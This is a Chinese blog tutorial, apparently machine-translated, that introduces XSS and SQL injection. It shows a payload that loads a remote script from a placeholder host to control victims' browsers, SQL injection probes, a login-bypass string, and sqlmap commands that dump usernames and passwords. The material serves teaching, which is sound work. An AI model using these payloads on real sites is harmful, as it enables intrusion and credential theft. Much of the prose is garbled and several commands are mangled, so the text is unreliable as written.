又到了每周的干货分享时间!~ VSRC感谢业界小伙伴——古月林夕投稿精品原创类文章。VSRC欢迎精品原创类文章投稿,优秀文章一旦采纳发布,将有好礼相送,我们为您准备的丰富奖品包括但不仅限于:Macbo…
这是每周干货共享时间的时候了! ~

VSRC感谢业界的小伙伴——
古月林夕提交原始文章。 VSRC欢迎提交精美的原创文章。一旦优秀的文章被采用,将有很好的礼物。我们为您准备的丰富奖品包括但不限于:MacbookAir,VSRC定制伞,VSRC定制水杯和VSRC精美POLO衫! (该活动的最终解释属于VSRC)
一,导言
近年来,随着Internet的迅速发展,Web安全问题的重要性越来越高。 Web应用程序面临的威胁来自许多方面。黑客的破坏是最有影响力的。黑客利用Web应用程序的漏洞非法入侵,从而破坏Web应用程序服务,窃取用户数据等。如何防止漏洞的安全性。威胁是一项艰巨的挑战。
为了增强用户的交互体验,开发人员在Web应用程序中使用大量客户端脚本,使Web应用程序的内容和功能丰富而有趣。但是,隐藏的安全威胁随之而来,黑客将攻击网络攻击。从服务器端到客户端,使用客户端脚本漏洞的攻击变得越来越强大,例如跨站点脚本(XSS)和SQL注入已经成为许多漏洞的最有针对性的目标。
二、XSS
XSS(Cross Site Scripting)是一种特殊类型的Web客户端脚本注入攻击。这通常意味着攻击者通过“HTML注入”篡改网页,并在用户浏览网页时插入恶意脚本来控制浏览。对设备的攻击。
当应用程序发送到浏览器的页面包含未正确转义的用户提供的数据,或者在页面上显示内容之前未验证的数据时,输入被视为浏览器。中间的动态内容导致跨站点脚本漏洞。
根据“数据是否保存在服务器上”,XSS分为:反射XSS和存储XSS。
反射型XSS:
服务器不对用户请求参数执行任何编码或转义,并直接将参数作为响应的一部分输出到页面。反射XSS是一次性的,易于实施的网络钓鱼攻击,它会诱使攻击者点击恶意链接来触发漏洞。
存储型XSS:
攻击者提供恶意有效负载输入并将其保存在后台一段时间。一旦用户访问包含恶意程序的网页文件,就会形成有效的攻击。丰富的文本输入空间,存储XSS存在隐患,最严重的可能是导致XSS蠕虫。
1,简单的测试脚本检测漏洞(XSS有效载荷)

将有效负载作为用户输入参数提交。这些有效负载的目的是关闭html标记并弹出浏览器。如果服务器没有过滤请求参数,即直接弹出窗口,则浏览器直接解析并执行包含恶意代码的响应信息,从而触发XSS漏洞,误报率低。
当然,一些xss漏洞隐藏得更深,无法轻易检测到。有必要构建一个更强大的有效负载来绕过某些xss简单过滤。
2,
xss攻击过程
确定可注入的xss漏洞后,诱骗用户加载远程脚本,例如将url的提交参数更改为
“&gt;&lt; script src=http://www.xxx.com/ec.js></script>
攻击者在这个远程脚本中写入真正的恶意负载,避免在url参数中直接写入大量
js代码,并通过恶意脚本控制用户的浏览器以实现攻击目的。
三、SQL注入
攻击者向Web表单提交SQL命令,提交或输入域名或页面请求的查询字符串,最后到达欺骗服务器执行恶意SQL命令。
sql注入漏洞检测
1手动注入
一个。在参数中输入单个引号“',导致执行查询语句时出现语法错误,并获取服务器的错误回显以确定服务器的
数据库类型信息. 根据数据库类型构造sql注入语句。
例如,get方法url [ http://www.xxx.com/abc.asp?p=YY ]
修改phttp://www.xxx.com/abc.asp?p=YY 和user&gt; 0的参数值以确定它是否是SQL-SERVER,还获取当前连接到数据库的用户名。
http://www.xxx.com/abc.asp?p=YY&n db_name()&gt; 0不仅可以确定它是否是SQL-SERVER,还可以获取当前正在使用的数据库名称
湾盲目,大多数情况下Web服务器关闭错误回显。
http://www.xxx.com/abc.asp?p=1 和1=2 sql命令未建立,结果为空或错误
http://www.xxx.com/abc.asp?p=1 和1=1 sql命令已建立,结果正常返回
两次测试成功后,可以判断加载sql是否已执行,并且存在SQL注入漏洞。
手动注入网站示例。登录密码('或'1'='1)并成功进入管理后台。

2,自动化工具检测注射
SQLmap - 一个免费的开源工具,用于检测和利用SQL注入漏洞
Sqlmap.py -u [指定url] -cookie -dbs //列出数据库
Sqlmap.py -u [指定url] - D [数据库名称] - -tables //列出库 的数据表
Sqlmap.py -u [指定url] -D [数据库名称] -T [数据表名称] -columns //列出数据表的列名称
Sqlmap.py -u [指定url] -D dvwa -T users-C用户,密码-dump //列出用户名和密码(sqlmap自动破解密码)
网站拖动库示例
四、END
随着Internet的发展,强调保护Web安全是一种必然趋势。欢迎大家一起学习和交流。博客地址http://blog.csdn.net/swallowing_。